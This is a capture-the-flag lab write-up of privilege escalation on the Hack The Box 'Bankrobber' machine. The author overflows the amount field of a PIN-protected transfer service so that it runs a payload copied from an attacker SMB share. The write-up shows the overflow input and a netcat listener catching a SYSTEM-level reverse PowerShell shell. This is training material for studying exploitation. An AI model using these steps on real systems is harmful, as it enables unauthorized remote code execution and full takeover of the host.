InfoSec LAB

Bankrobber_Privilege_Escalation

Created: 3 min read

Internet E-Coin Transfer System

  • The custom application that was running on the target port 910 was initially unreachable due to the firewall restriction.
  • The issue was resolved by tunneling with Chisel.
  • It claimed to be Internet E-Coin Transfer System, which appeared to be a command-line variant of the web application.
  • It also has a security lock, which later got brute-forced
  • the application was using another binary, c:\Users\admin\Documents\transfer.exe, to transfer the amount.
  • That amount parameter is confirmed to be vulnerable to Buffer Overflow, effectively overwriting the transfer tool field

Buffer Overflow

C:\tmp>copy \\10.10.14.10\smb\SystemTransferTool.exe .
copy \\10.10.14.10\smb\SystemTransferTool.exe .
        1 file(s) copied.

Payload transferred over SMB This will overwrite the transfer tool field and hopefully transfer the system privileges, instead of E-Coins.

Now, I just need to put the absolute path of the payload as a suffix to those 32 buffers

┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ patterncreate -l 32
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab

Generating a pattern of 32 buffers

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbC:\tmp\SystemTransferTool.exe This is whole thing.

┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ nc 127.0.0.1 9100
 --------------------------------------------------------------
 Internet E-Coin Transfer System
 International Bank of Sun church
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------
 Please enter your super secret 4 digit PIN code to login:
 [$] 0021
 [$] PIN is correct, access granted!
 --------------------------------------------------------------
 Please enter the amount of e-coins you would like to transfer:
 [$] Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbC:\tmp\SystemTransferTool.exe
 [$] Transfering $Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbC:\tmp\SystemTransferTool.exe using our e-coin transfer application. 
 [$] Executing e-coin transfer tool: C:\tmp\SystemTransferTool.exe
 
 [$] Transaction in progress, you can safely disconnect...

Successfully overwritten the transfer tool field with the path to my tool

┌──(kali㉿kali)-[~/archive/htb/labs/bankrobber]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.154] 50204
Windows PowerShell running as user BANKROBBER$ on BANKROBBER
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
Bankrobber
PS C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::21e
   IPv6 Address. . . . . . . . . . . : dead:beef::141d:3776:23f6:cb98
   Temporary IPv6 Address. . . . . . : dead:beef::7883:7206:63c5:55a8
   Link-local IPv6 Address . . . . . : fe80::141d:3776:23f6:cb98%2
   IPv4 Address. . . . . . . . . . . : 10.10.10.154
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%2
                                       10.10.10.2
 
Tunnel adapter isatap.{0637FAE2-5EF8-43F7-ADAC-E58020091A92}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : htb

It transferred the system privileges as I hoped for. System Level Compromise

Interactive Graph View

Backlinks